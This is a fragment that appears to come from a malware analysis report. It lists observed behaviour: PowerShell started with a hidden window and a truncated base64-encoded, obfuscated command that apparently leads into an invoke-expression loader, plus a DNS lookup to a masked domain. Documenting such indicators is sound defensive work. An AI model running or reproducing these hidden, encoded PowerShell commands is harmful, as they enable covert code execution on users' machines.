Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WinDowsTyle hidden -e LgAgACgAIAAkAHAAUwBIAG8ATQBFAFsAMgAxAF0AKwAkAHAAUwBoAG8ATQBlAFsAMwAwAF0AKwAnAFgAJwApACAAKAAgACgAJwBOAEUAVgAnACsAJwBuACcAKwAnAHMAJwArACcAYQAnACsAJwBkACcAKwAnAGEAcwBkACAAPQ...
- DNS ASK dq###d1qw8.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WinDowsTyle hidden -e LgAgACgAIAAkAHAAUwBIAG8ATQBFAFsAMgAxAF0AKwAkAHAAUwBoAG8ATQBlAFsAMwAwAF0AKwAnAFgAJwApACAAKAAgACgAJwBOAEUAVgAnACsAJwBuACcAKwAnAHMAJwArACcAYQAnACsAJwBkACcAKwAnAGEAcwBkACAAPQ...' (with hidden window)